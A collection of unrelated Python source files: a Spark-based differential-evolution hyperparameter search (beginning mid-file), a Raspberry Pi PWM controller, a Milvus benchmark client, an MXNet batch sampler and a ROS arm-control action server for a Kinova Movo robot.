# check if param needs rounding
if self.types[i] != 'float':
par = int(round(par))
indiv_correct.append(par)
return indiv_correct
# create donor population based on mutation of three vectors
def _mutation(self, population, bounds):
"""
Args:
:population:
:bounds:
Returns:
"""
donor_population = []
for i in range(self.n):
indiv_indices = list(range(0, self.n))
indiv_indices.remove(i)
candidates = random.sample(indiv_indices, 3)
x_1 = population[candidates[0]]
x_2 = population[candidates[1]]
x_3 = population[candidates[2]]
# substracting the second from the third candidate
x_diff = [x_2_i - x_3_i for x_2_i, x_3_i in zip(x_2, x_3)]
donor_vec = [x_1_i + self.F*x_diff_i for x_1_i, x_diff_i in zip (x_1, x_diff)]
donor_vec = self._ensure_bounds(donor_vec, bounds)
donor_population.append(donor_vec)
return donor_population
# recombine donor vectors according to crossover probability
def _recombination(self, population, donor_population):
"""
Args:
:population:
:donor_population:
Returns:
"""
trial_population = []
for k in range(self.n):
target_vec = population[k]
donor_vec = donor_population[k]
trial_vec = []
for p in range(len(self.parbounds)):
crossover = random.random()
# if random number is below set crossover probability do recombination
if crossover <= self.CR:
trial_vec.append(donor_vec[p])
else:
trial_vec.append(target_vec[p])
trial_population.append(trial_vec)
return trial_population
# select the best individuals from each generation
def _selection(self, population, trial_population):
"""
Args:
:population:
:trial_population:
Returns:
"""
# Calculate trial vectors and target vectors and select next generation
if self._generation == 0:
parsed_population = []
for target_vec in population:
parsed_target_vec = self._parse_back(target_vec)
parsed_population.append(parsed_target_vec)
parsed_population = self._parse_to_dict(parsed_population)
self._scores = self.objective_function(parsed_population, name=self.name)
if self.direction.upper() == Direction.MAX:
new_gen_best = max(self._scores)
elif self.direction.upper() == Direction.MIN:
new_gen_best = min(self._scores)
else:
raise ValueError('invalid direction: ' + self.direction)
new_gen_best_param = self._parse_back(population[self._scores.index(new_gen_best)])
index = 0
for name in self._param_names:
new_gen_best_param[index] = name + "=" + str(new_gen_best_param[index])
index += 1
parsed_trial_population = []
for index, trial_vec in enumerate(trial_population):
parsed_trial_vec = self._parse_back(trial_vec)
parsed_trial_population.append(parsed_trial_vec)
parsed_trial_population = self._parse_to_dict(parsed_trial_population)
trial_population_scores = self.objective_function(parsed_trial_population, name=self.name)
for i in range(self.n):
trial_vec_score_i = trial_population_scores[i]
target_vec_score_i = self._scores[i]
if self.direction.upper() == Direction.MAX:
if trial_vec_score_i > target_vec_score_i:
self._scores[i] = trial_vec_score_i
population[i] = trial_population[i]
elif self.direction.upper() == Direction.MIN:
if trial_vec_score_i < target_vec_score_i:
self._scores[i] = trial_vec_score_i
population[i] = trial_population[i]
self._generation += 1
return population
# parse the converted values back to original
def _parse_back(self, individual):
"""
Args:
:individual:
Returns:
"""
original_representation = []
for index, parameter in enumerate(individual):
if self.types[index] == self._types[2]:
original_representation.append(self.parbounds[index][parameter])
else:
original_representation.append(parameter)
return original_representation
# for parallelization purposes one can parse the population from a list to a dictionary format
# User only has to add the parameters he wants to optimize to population_dict
def _parse_to_dict(self, population):
"""
Args:
:population:
Returns:
"""
# reset entries
for entry in self._ordered_population_dict:
self._ordered_population_dict[entry] = []
for indiv in population:
index = 0
for param in self._param_names:
self._ordered_population_dict[param].append(indiv[index])
index = index + 1
return self._ordered_population_dict
def get_dict(self):
return self._ordered_population_dict
def _run(train_fn, search_dict, direction = Direction.MAX, generations=4, population=6, mutation=0.5, crossover=0.7, cleanup_generations=False, local_logdir=False, name="no-name", optimization_key=None):
"""
Args:
:train_fn:
:search_dict:
:direction:
:generations:
:population:
:mutation:
:crossover:
:cleanup_generations:
:local_logdir:
:name:
:optimization_key:
Returns:
"""
global run_id
global local_logdir_bool
local_logdir_bool = local_logdir
global spark
spark = util._find_spark()
global objective_function
objective_function = train_fn
global cleanup
cleanup = cleanup_generations
global opt_key
opt_key = optimization_key
argcount = six.get_function_code(train_fn).co_argcount
arg_names = six.get_function_code(train_fn).co_varnames
ordered_arr = []
app_id = spark.sparkContext.applicationId
arg_lists = list(search_dict.values())
for i in range(len(arg_lists)):
if len(arg_lists[i]) != 2:
raise ValueError('Boundary list must contain exactly two elements, [lower_bound, upper_bound] for float/int '
'or [category1, category2] in the case of strings')
assert population > 3, 'population should be greater than 3'
assert generations > 1, 'generations should be greater than 1'
argIndex = 0
while argcount != 0:
ordered_arr.append((arg_names[argIndex], search_dict[arg_names[argIndex]]))
argcount = argcount - 1
argIndex = argIndex + 1
ordered_dict = OrderedDict(ordered_arr)
bounds_list = []
types_list = []
for entry in ordered_dict:
bounds_list.append((ordered_dict[entry][0], ordered_dict[entry][1]))
if isinstance(ordered_dict[entry][0], int):
types_list.append('int')
elif isinstance(ordered_dict[entry][0], float):
types_list.append('float')
else:
types_list.append('cat')
global diff_evo
diff_evo = DifferentialEvolution(_execute_all,
bounds_list,
types_list,
ordered_dict,
direction=direction,
generations=generations,
population=population,
crossover=crossover,
mutation=mutation,
name=name)
root_dir = experiment_utils._get_experiments_dir() + "/" + str(app_id) + "_" + str(run_id)
best_param, best_metric = diff_evo._solve(root_dir)
param_string = ''
for hp in best_param:
param_string = param_string + hp + '&'
param_string = param_string[:-1]
best_exp_logdir, return_dict = _get_best(str(root_dir), direction)
print('Finished Experiment \n')
return best_exp_logdir, experiment_utils._get_params_dict(best_exp_logdir), best_metric, return_dict
def _evolutionary_launch(spark, train_fn, args_dict, name="no-name"):
""" Run the wrapper function with each hyperparameter combination as specified by the dictionary
Args:
:spark_session: SparkSession object
:train_fn: The TensorFlow function to run
:args_dict: (optional) A dictionary containing hyperparameter values to insert as arguments for each TensorFlow job
"""
global run_id
sc = spark.sparkContext
app_id = str(sc.applicationId)
arg_lists = list(args_dict.values())
num_executions = len(arg_lists[0])
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Force execution on executor, since GPU is located on executor
global generation_id
global run_id
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup(os.environ['ML_ID'], "{} | Differential Evolution, Generation: {}".format(name, generation_id))
nodeRDD.foreachPartition(_prepare_func(app_id, generation_id, train_fn, args_dict, run_id, opt_key))
generation_id += 1
return experiment_utils._get_experiments_dir() + '/' + str(app_id) + "_" + str(run_id)
#Helper to put Spark required parameter iter in function signature
def _prepare_func(app_id, generation_id, train_fn, args_dict, run_id, opt_key):
"""
Args:
:app_id:
:generation_id:
:train_fn:
:args_dict:
:run_id:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
:iter:
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
tb_hdfs_path = ''
hdfs_exec_logdir = ''
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
global local_logdir_bool
try:
#Arguments
if args_dict:
param_string, params, args = experiment_utils.build_parameters(train_fn, executor_num, args_dict)
val = _get_return_file(param_string, app_id, generation_id, run_id)
hdfs_exec_logdir, hdfs_appid_logdir = experiment_utils._create_experiment_subdirectories(app_id, run_id, param_string, 'differential_evolution', sub_type='generation.' + str(generation_id), params=params)
logfile = experiment_utils._init_logger(hdfs_exec_logdir)
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir_bool)
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task ' + param_string)
if val is not None:
val = json.loads(val)
task_start = time.time()
if val is None:
val = train_fn(*args)
task_end = time.time()
time_str = 'Finished task ' + param_string + ' - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
experiment_utils._handle_return(val, hdfs_exec_logdir, opt_key, logfile)
print('Returning metric ' + str(val))
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun
def _get_return_file(param_string, app_id, generation_id, run_id):
"""
Args:
:param_string:
:app_id:
:generation_id:
:run_id:
Returns:
"""
handle = hdfs.get()
for i in range(generation_id):
possible_result_path = experiment_utils._get_experiments_dir() + '/' + app_id + '_' \
+ str(run_id) + '/generation.' + str(i) + '/' + param_string + '/.outputs.json'
if handle.exists(possible_result_path):
return_file_contents = hdfs.load(possible_result_path)
return return_file_contents
return None
def _get_best(root_logdir, direction):
min_val = sys.float_info.max
min_logdir = None
max_val = sys.float_info.min
max_logdir = None
generation_folders = hdfs.ls(root_logdir)
generation_folders.sort()
for generation in generation_folders:
for individual in hdfs.ls(generation):
invidual_files = hdfs.ls(individual, recursive=True)
for file in invidual_files:
if file.endswith("/.metric"):
val = hdfs.load(file)
val = float(val)
if val > max_val:
max_val = val
max_logdir = file[:-8]
if val < min_val:
min_val = val
min_logdir = file[:-8]
if direction.upper() == Direction.MAX:
return_dict = {}
with hdfs.open_file(max_logdir + '/.outputs.json', flags="r") as fi:
return_dict = json.loads(fi.read())
fi.close()
return max_logdir, return_dict
else:
return_dict = {}
with hdfs.open_file(min_logdir + '/.outputs.json', flags="r") as fi:
return_dict = json.loads(fi.read())
fi.close()
return min_logdir, return_dict
|
controller.py
|
#
# This software is released under the MIT License, see LICENSE
#
# Copyright (c) 2020 chimo
#
import RPi.GPIO as GPIO
import time
import os
import threading
import Queue as queue
# pin name
SPICLK = 11
SPIMOSI = 10
SPIMISO = 9
SPICS = 8
GPIO17 = 17 # pin11
GPIO27 = 27 # pin13
vol_old = 0
def pwm(q,event):
print('pwm()')
global pwm1
try:
while True:
event.wait()
dc = q.get()
pwm1.ChangeDutyCycle(dc)
print('ChangeDutyCycle',dc)
except KeyboardInterrupt:
pass
def volume(q,event):
print('volume()')
# pin name
global SPICLK
global SPIMOSI
global SPIMISO
global SPICS
global vol_old
try:
while True:
inputVal0 = readadc(0, SPICLK, SPIMOSI, SPIMISO, SPICS)
vol = "{0}".format(int(inputVal0*100/1023)) #1023
if vol_old != vol:
print('Yes',vol,vol_old)
vol_old = vol
q.put(vol)
event.set()
else:
print('No',vol)
time.sleep(0.2)
except KeyboardInterrupt:
pass
def readadc(adcnum, clockpin, mosipin, misopin, cspin):
print('readadc() start')
if adcnum > 1 or adcnum < 0:
return -1
GPIO.output(cspin, GPIO.HIGH) #CSON
GPIO.output(clockpin, GPIO.LOW) #SCSKON
GPIO.output(cspin, GPIO.LOW) #CSOFF
#commandout = 0b01101000
commandout = adcnum #CH
commandout |= 0x0d #SGL/DEF=1MSB
commandout <<= 3 #LSB8bit
for i in range(4):
# LSB8bit3bit
if commandout & 0x80:
GPIO.output(mosipin, GPIO.HIGH)
else:
GPIO.output(mosipin, GPIO.LOW)
commandout <<= 1
GPIO.output(clockpin, GPIO.HIGH)
GPIO.output(clockpin, GPIO.LOW)
adcout = 0
#11bit null
for i in range(11):
GPIO.output(clockpin, GPIO.HIGH)
GPIO.output(clockpin, GPIO.LOW)
adcout <<= 1
if i>0 and GPIO.input(misopin)==GPIO.HIGH:
adcout |= 0x1
GPIO.output(cspin, GPIO.HIGH)
print('readadc() end')
return adcout
def main():
#initialize
GPIO.setmode(GPIO.BCM)
# pin name
global SPICLK
global SPIMOSI
global SPIMISO
global SPICS
global GPIO17 # pin11
global GPIO27 # pin13
global pwm1
global pwm2
# SPI
GPIO.setup(SPICLK, GPIO.OUT)
GPIO.setup(SPIMOSI, GPIO.OUT)
GPIO.setup(SPIMISO, GPIO.IN)
GPIO.setup(SPICS, GPIO.OUT)
#pwm
GPIO.setup(GPIO17, GPIO.OUT)
GPIO.setup(GPIO27, GPIO.OUT)
pwm1 = GPIO.PWM(GPIO17, 100) # frequency 100Hz
pwm2 = GPIO.PWM(GPIO27, 100) # frequency 100Hz
pwm1.start(0)
pwm2.start(0)
print('main() initialize done')
try:
q = queue.Queue()
event = threading.Event()
t1 = threading.Thread(target=volume, args=(q,event))
t2 = threading.Thread(target=pwm, args=(q,event))
t1.start()
t2.start()
while True:
time.sleep(0.1)
except KeyboardInterrupt:
pass
pwm1.stop()
pwm2.stop()
GPIO.cleanup()
if __name__ == '__main__':
main()
|
client.py
|
import sys
import pdb
import random
import logging
import json
import time, datetime
from multiprocessing import Process
from milvus import Milvus, IndexType, MetricType
logger = logging.getLogger("milvus_benchmark.client")
SERVER_HOST_DEFAULT = "127.0.0.1"
# SERVER_HOST_DEFAULT = "192.168.1.130"
SERVER_PORT_DEFAULT = 19530
INDEX_MAP = {
"flat": IndexType.FLAT,
"ivf_flat": IndexType.IVFLAT,
"ivf_sq8": IndexType.IVF_SQ8,
"nsg": IndexType.RNSG,
"ivf_sq8h": IndexType.IVF_SQ8H,
"ivf_pq": IndexType.IVF_PQ,
"hnsw": IndexType.HNSW,
"annoy": IndexType.ANNOY
}
epsilon = 0.1
def time_wrapper(func):
"""
This decorator prints the execution time for the decorated function.
"""
def wrapper(*args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
end = time.time()
logger.info("Milvus {} run in {}s".format(func.__name__, round(end - start, 2)))
return result
return wrapper
class MilvusClient(object):
def __init__(self, collection_name=None, ip=None, port=None, timeout=60):
self._collection_name = collection_name
try:
i = 1
start_time = time.time()
if not ip:
self._milvus = Milvus(
host = SERVER_HOST_DEFAULT,
port = SERVER_PORT_DEFAULT)
else:
# retry connect for remote server
while time.time() < start_time + timeout:
try:
self._milvus = Milvus(
host = ip,
port = port)
if self._milvus.server_status():
logger.debug("Try connect times: %d, %s" % (i, round(time.time() - start_time, 2)))
break
except Exception as e:
logger.debug("Milvus connect failed")
i = i + 1
except Exception as e:
raise e
def __str__(self):
return 'Milvus collection %s' % self._collection_name
def check_status(self, status):
if not status.OK():
logger.error(status.message)
raise Exception("Status not ok")
def check_result_ids(self, result):
for index, item in enumerate(result):
if item[0].distance >= epsilon:
logger.error(index)
logger.error(item[0].distance)
raise Exception("Distance wrong")
def create_collection(self, collection_name, dimension, index_file_size, metric_type):
if not self._collection_name:
self._collection_name = collection_name
if metric_type == "l2":
metric_type = MetricType.L2
elif metric_type == "ip":
metric_type = MetricType.IP
elif metric_type == "jaccard":
metric_type = MetricType.JACCARD
elif metric_type == "hamming":
metric_type = MetricType.HAMMING
elif metric_type == "sub":
metric_type = MetricType.SUBSTRUCTURE
elif metric_type == "super":
metric_type = MetricType.SUPERSTRUCTURE
else:
logger.error("Not supported metric_type: %s" % metric_type)
create_param = {'collection_name': collection_name,
'dimension': dimension,
'index_file_size': index_file_size,
"metric_type": metric_type}
status = self._milvus.create_collection(create_param)
self.check_status(status)
@time_wrapper
def insert(self, X, ids=None):
status, result = self._milvus.add_vectors(self._collection_name, X, ids)
self.check_status(status)
return status, result
@time_wrapper
def delete_vectors(self, ids):
status = self._milvus.delete_by_id(self._collection_name, ids)
self.check_status(status)
@time_wrapper
def flush(self):
status = self._milvus.flush([self._collection_name])
self.check_status(status)
@time_wrapper
def compact(self):
status = self._milvus.compact(self._collection_name)
self.check_status(status)
@time_wrapper
def create_index(self, index_type, index_param=None):
index_type = INDEX_MAP[index_type]
logger.info("Building index start, collection_name: %s, index_type: %s" % (self._collection_name, index_type))
if index_param:
logger.info(index_param)
status = self._milvus.create_index(self._collection_name, index_type, index_param)
self.check_status(status)
def describe_index(self):
status, result = self._milvus.describe_index(self._collection_name)
self.check_status(status)
index_type = None
for k, v in INDEX_MAP.items():
if result._index_type == v:
index_type = k
break
return {"index_type": index_type, "index_param": result._params}
def drop_index(self):
logger.info("Drop index: %s" % self._collection_name)
return self._milvus.drop_index(self._collection_name)
@time_wrapper
def query(self, X, top_k, search_param=None):
status, result = self._milvus.search_vectors(self._collection_name, top_k, query_records=X, params=search_param)
self.check_status(status)
return result
@time_wrapper
def query_ids(self, top_k, ids, search_param=None):
status, result = self._milvus.search_by_ids(self._collection_name, ids, top_k, params=search_param)
self.check_result_ids(result)
return result
def count(self):
return self._milvus.count_collection(self._collection_name)[1]
def delete(self, timeout=120):
timeout = int(timeout)
logger.info("Start delete collection: %s" % self._collection_name)
self._milvus.drop_collection(self._collection_name)
i = 0
while i < timeout:
if self.count():
time.sleep(1)
i = i + 1
continue
else:
break
if i >= timeout:
logger.error("Delete collection timeout")
def describe(self):
return self._milvus.describe_collection(self._collection_name)
def show_collections(self):
return self._milvus.show_collections()
def exists_collection(self, collection_name=None):
if collection_name is None:
collection_name = self._collection_name
status, res = self._milvus.has_collection(collection_name)
# self.check_status(status)
return res
@time_wrapper
def preload_collection(self):
status = self._milvus.preload_collection(self._collection_name, timeout=3000)
self.check_status(status)
return status
def get_server_version(self):
status, res = self._milvus.server_version()
return res
def get_server_mode(self):
return self.cmd("mode")
def get_server_commit(self):
return self.cmd("build_commit_id")
def get_server_config(self):
return json.loads(self.cmd("get_config *"))
def get_mem_info(self):
result = json.loads(self.cmd("get_system_info"))
result_human = {
# unit: Gb
"memory_used": round(int(result["memory_used"]) / (1024*1024*1024), 2)
}
return result_human
def cmd(self, command):
status, res = self._milvus._cmd(command)
logger.info("Server command: %s, result: %s" % (command, res))
self.check_status(status)
return res
def fit(collection_name, X):
milvus = Milvus()
milvus.connect(host = SERVER_HOST_DEFAULT, port = SERVER_PORT_DEFAULT)
start = time.time()
status, ids = milvus.add_vectors(collection_name, X)
end = time.time()
logger(status, round(end - start, 2))
def fit_concurrent(collection_name, process_num, vectors):
processes = []
for i in range(process_num):
p = Process(target=fit, args=(collection_name, vectors, ))
processes.append(p)
p.start()
for p in processes:
p.join()
if __name__ == "__main__":
import numpy
import sklearn.preprocessing
# collection_name = "tset_test"
# # collection_name = "test_tset1"
# m = MilvusClient(collection_name)
# m.delete()
# time.sleep(2)
# m.create_collection(collection_name, 128, 20, "ip")
# print(m.describe())
# print(m.count())
# print(m.describe_index())
# # sys.exit()
# tmp = [[random.random() for _ in range(128)] for _ in range(20000)]
# tmp1 = sklearn.preprocessing.normalize(tmp, axis=1, norm='l2')
# print(tmp1[0][0])
# tmp = [[random.random() for _ in range(128)] for _ in range(20000)]
# tmp /= numpy.linalg.norm(tmp)
# print(tmp[0][0])
# sum_1 = 0
# sum_2 = 0
# for item in tmp:
# for i in item:
# sum_2 = sum_2 + i * i
# break
# for item in tmp1:
# for i in item:
# sum_1 = sum_1 + i * i
# break
# print(sum_1, sum_2)
# insert_vectors = tmp.tolist()
# # print(insert_vectors)
# for i in range(2):
# m.insert(insert_vectors)
# time.sleep(5)
# print(m.create_index("ivf_flat", 16384))
# X = [insert_vectors[0], insert_vectors[1], insert_vectors[2]]
# top_k = 5
# nprobe = 1
# print(m.query(X, top_k, nprobe))
# # print(m.drop_index())
# print(m.describe_index())
# sys.exit()
# # insert_vectors = [[random.random() for _ in range(128)] for _ in range(100000)]
# # for i in range(100):
# # m.insert(insert_vectors)
# # time.sleep(5)
# # print(m.describe_index())
# # print(m.drop_index())
# m.create_index("ivf_sq8h", 16384)
# print(m.count())
# print(m.describe_index())
# sys.exit()
# print(m.create_index("ivf_sq8h", 16384))
# print(m.count())
# print(m.describe_index())
import numpy as np
# def mmap_fvecs(fname):
# x = np.memmap(fname, dtype='int32', mode='r')
# d = x[0]
# return x.view('float32').reshape(-1, d + 1)[:, 1:]
# print(mmap_fvecs("/poc/deep1b/deep1B_queries.fvecs"))
# SIFT_SRC_QUERY_DATA_DIR = '/poc/yuncong/ann_1000m'
# file_name = SIFT_SRC_QUERY_DATA_DIR+'/'+'query.npy'
# data = numpy.load(file_name)
# query_vectors = data[0:2].tolist()
# print(len(query_vectors))
# results = m.query(query_vectors, 10, 10)
# result_ids = []
# for result in results[1]:
# tmp = []
# for item in result:
# tmp.append(item.id)
# result_ids.append(tmp)
# print(result_ids[0][:10])
# # gt
# file_name = SIFT_SRC_QUERY_DATA_DIR+"/gnd/"+"idx_1M.ivecs"
# a = numpy.fromfile(file_name, dtype='int32')
# d = a[0]
# true_ids = a.reshape(-1, d + 1)[:, 1:].copy()
# print(true_ids[:3, :2])
# print(len(true_ids[0]))
# import numpy as np
# import sklearn.preprocessing
# def mmap_fvecs(fname):
# x = np.memmap(fname, dtype='int32', mode='r')
# d = x[0]
# return x.view('float32').reshape(-1, d + 1)[:, 1:]
# data = mmap_fvecs("/poc/deep1b/deep1B_queries.fvecs")
# data = sklearn.preprocessing.normalize(data, axis=1, norm='l2')
# np.save("/test/milvus/deep1b/query.npy", data)
dimension = 4096
insert_xb = 10000
insert_vectors = [[random.random() for _ in range(dimension)] for _ in range(insert_xb)]
data = sklearn.preprocessing.normalize(insert_vectors, axis=1, norm='l2')
np.save("/test/milvus/raw_data/random/query_%d.npy" % dimension, data)
sys.exit()
total_size = 100000000
# total_size = 1000000000
file_size = 100000
# file_size = 100000
dimension = 4096
file_num = total_size // file_size
for i in range(file_num):
print(i)
# fname = "/test/milvus/raw_data/deep1b/binary_96_%05d" % i
fname = "/test/milvus/raw_data/random/binary_%dd_%05d" % (dimension, i)
# print(fname, i*file_size, (i+1)*file_size)
# single_data = data[i*file_size : (i+1)*file_size]
single_data = [[random.random() for _ in range(dimension)] for _ in range(file_size)]
single_data = sklearn.preprocessing.normalize(single_data, axis=1, norm='l2')
np.save(fname, single_data)
|
abstractBatchSampler.py
|
import cv2
import time
import numpy as np
import mxnet as mx
import mxnet.ndarray as nd
from enum import Enum
from dataProcessor.imageProcessor import ImageProcessor
from dataProcessor.imageSampler import ImageSampler
from dataProcessor.miningTypes import MiningTypes
from multiprocessing import Process, Queue
class AbstractBatchSampler():
def __init__(self, batch_size, image_sampler, net=None, ctx=mx.cpu(), channels=3):
self.batch_size = batch_size
self.image_sampler = image_sampler
self.ctx = ctx
self.net = net
self.channels = channels
self.batches = Queue()
for worker in range(0,8):
fillDeamon = Process(target=self.fillDeamon, args=(self.batches,))
fillDeamon.daemon = True
fillDeamon.start()
def fillDeamon(self, queue):
while True:
while queue.qsize() < 32:
self.fill(queue)
time.sleep(1)
def fill(self, queue):
queue.put(self.prepareBatch())
def take(self):
return self.batches.get()
def getBatch(self, validation=False, file=None):
if self.batches.qsize() > 0:
return self.take()
else:
time.sleep(1)
return self.getBatch(validation=validation, file=file)
def prepareBatch(self, validation=False, train=False):
return NotImplemented
def reset(self):
self.image_sampler.reset()
|
movo_jtas.py
|
"""--------------------------------------------------------------------
Copyright (c) 2017, Kinova Robotics inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\file movo_jtas.py
\brief This module offer an interface to control the movo arms
\Platform: Linux/ROS Indigo
--------------------------------------------------------------------"""
from movo_joint_interface.jaco_joint_controller import SIArmController
from trajectory_smoother import TrajectorySmoother
from moveit_python import MoveGroupInterface
from moveit_msgs.msg import MoveItErrorCodes
from control_msgs.msg import (
FollowJointTrajectoryAction,
FollowJointTrajectoryFeedback,
FollowJointTrajectoryResult,
GripperCommandAction,
GripperCommandFeedback,
GripperCommandResult,
)
from trajectory_msgs.msg import JointTrajectoryPoint
from std_msgs.msg import UInt16,Bool
from movo_msgs.msg import Status
from threading import Thread
import errno
import math
import rospy
import actionlib
import bisect
import operator
from copy import deepcopy
def calc_grip_dist(b):
l1 = 30.9476-87.0932*math.sin(b[0]-0.627445866)
l2 = 30.9476-87.0932*math.sin(b[1]-0.627445866)
dist = l1+l2
if (dist < (2*30.9476)):
dist-=17.0
else:
dist+=1.08
return (dist * 0.001)
def calc_grip_angle(x):
dist = x*1000.0
tmp = (0.5*dist-30.9476)/-87.0932
a = math.asin(tmp)+0.627445866
if (0.5*dist > 30.9476):
a+=0.00599
else:
a-=0.1
return (a)
class MovoArmJTAS(object):
def __init__(self, prefix="", gripper="", interface='eth0', jaco_ip="10.66.171.15", dof="", rate=100.0):
self._alive = False
self.init_success = True
self._action_name = rospy.get_name()
self._prefix = prefix
# Action Feedback/Result
if ("kg2" == gripper):
self.gripper_stall_force = 20.0
self.gripper_dead_zone = 0.01
elif("kg3" == gripper):
self.gripper_stall_force = 30.0
self.gripper_dead_zone = 0.01
self._last_gripper_pos = 0.165
self._gripper_stall_to = 0.7
self._gripper_pos_stall = False
self._last_movement_time = rospy.get_time()
self.dof = dof
self._planner_homing = False
"""
Define the joint names
"""
if ("6dof" == dof):
self._joint_names = [self._prefix+'_shoulder_pan_joint',
self._prefix+'_shoulder_lift_joint',
self._prefix+'_elbow_joint',
self._prefix+'_wrist_1_joint',
self._prefix+'_wrist_2_joint',
self._prefix+'_wrist_3_joint']
self._body_joints = ["right_elbow_joint",
"right_shoulder_lift_joint",
"right_shoulder_pan_joint",
"right_wrist_1_joint",
"right_wrist_2_joint",
"right_wrist_3_joint",
"left_elbow_joint",
"left_shoulder_lift_joint",
"left_shoulder_pan_joint",
"left_wrist_1_joint",
"left_wrist_2_joint",
"left_wrist_3_joint",
"linear_joint",
"pan_joint",
"tilt_joint"]
self._homed = [-2.135, -0.227, -1.478, -2.083, 1.445, 1.321, 2.135, 0.227, 1.478, 2.083, -1.445, -1.321, 0.25, 0.0, 0.0]
elif ("7dof" == dof):
self._joint_names = [self._prefix + '_shoulder_pan_joint',
self._prefix + '_shoulder_lift_joint',
self._prefix + '_arm_half_joint',
self._prefix + '_elbow_joint',
self._prefix + '_wrist_spherical_1_joint',
self._prefix + '_wrist_spherical_2_joint',
self._prefix + '_wrist_3_joint']
self._body_joints = ["right_shoulder_pan_joint",
"right_shoulder_lift_joint",
"right_arm_half_joint",
"right_elbow_joint",
"right_wrist_spherical_1_joint",
"right_wrist_spherical_2_joint",
"right_wrist_3_joint",
"left_shoulder_pan_joint",
"left_shoulder_lift_joint",
"left_arm_half_joint",
"left_elbow_joint",
"left_wrist_spherical_1_joint",
"left_wrist_spherical_2_joint",
"left_wrist_3_joint",
"linear_joint",
"pan_joint",
"tilt_joint"]
self._homed = [-1.5, -0.2, -0.15, -2.0, 2.0, -1.24, -1.1, 1.5, 0.2, 0.15, 2.0, -2.0, 1.24, 1.1, 0.25, 0, 0]
else:
rospy.logerr("DoF needs to be set 6 or 7, cannot start MovoArmJTAS")
return
"""
Controller parameters from arguments, messages, and dynamic
reconfigure
"""
self._trajectory_control_rate = rate # Hz
self._goal_time = 0.0
self._stopped_velocity = 0.0
self._goal_error = dict()
self._path_thresh = dict()
self._traj_smoother = TrajectorySmoother(rospy.get_name(),self._prefix)
self._ctl = SIArmController(self._prefix,gripper,interface,jaco_ip, dof)
self._ctl.Pause()
self._estop_delay = 0
self.home_arm_sub = rospy.Subscriber('/movo/home_arms', Bool, self._home_arms)
self.home_arm_pub = rospy.Publisher('/movo/arms_are_homed', Bool, queue_size=1)
self._arms_homing = False
if not self._ctl.init_success:
rospy.logerr("Failed to initialize controller, make sure the serial number exists")
self.clean_shutdown()
self.init_success = False
return
self.estop = False
self._fdbk = FollowJointTrajectoryFeedback()
self._result = FollowJointTrajectoryResult()
#self._dyn = reconfig_server
self._ns = '/movo/%s_arm_controller'%self._prefix
self._fjt_ns = self._ns + '/follow_joint_trajectory'
self._server = actionlib.SimpleActionServer(
self._fjt_ns,
FollowJointTrajectoryAction,
execute_cb=self._on_trajectory_action,
auto_start=False)
self._alive = True
self._movo_status_sub = rospy.Subscriber("/movo/feedback/status",Status,self._update_movo_status)
self._server.start()
# Action Server
self._gripper_server = actionlib.SimpleActionServer(
'/movo/%s_gripper_controller/gripper_cmd'%self._prefix,
GripperCommandAction,
execute_cb=self._on_gripper_action,
auto_start=False)
self._gripper_server.start()
self._gripper_action_name = '/movo/%s_gripper_controller/gripper_cmd'%self._prefix
# Action Feedback/Result
self._gripper_fdbk = GripperCommandFeedback()
self._gripper_result = GripperCommandResult()
self._gripper_timeout = 6.0
self._ctl.api.InitFingers()
def _home_arm_planner(self):
if self._prefix == 'left':
rospy.sleep(5)
else:
move_group_jtas = MoveGroupInterface("upper_body", "base_link")
move_group_jtas.setPlannerId("RRTConnectkConfigDefault")
success = False
while not rospy.is_shutdown() and not success:
result = move_group_jtas.moveToJointPosition(self._body_joints, self._homed, 0.05)
if result.error_code.val == MoveItErrorCodes.SUCCESS:
rospy.logerr("_home_arm_planner completed ")
success = True
else:
rospy.logerr("_home_arm_planner: _home_arm_planner failed (%d)" % result.error_code.val)
self._arms_homing = True
self._ctl.api.MoveHome()
self._ctl.api.InitFingers()
self.home_arm_pub.publish(Bool(True))
rospy.sleep(2.0)
self._arms_homing = False
self._planner_homing = False
def _update_gripper_feedback(self, position):
tmp = self._ctl.GetGripperFdbk()
grip_dist = calc_grip_dist(tmp[0])
self._gripper_fdbk.position = grip_dist
self._gripper_fdbk.effort = sum(tmp[2])
self._gripper_fdbk.stalled = (self._gripper_fdbk.effort >
self.gripper_stall_force)
self._gripper_fdbk.reached_goal = (math.fabs(grip_dist -
position) <
self.gripper_dead_zone)
